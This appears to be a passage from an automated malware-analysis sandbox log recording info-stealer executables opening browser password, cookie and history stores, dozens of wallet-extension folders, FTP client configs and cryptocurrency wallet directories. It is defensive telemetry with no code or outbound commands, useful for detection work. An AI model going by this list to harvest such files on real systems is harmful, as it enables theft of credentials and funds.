Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
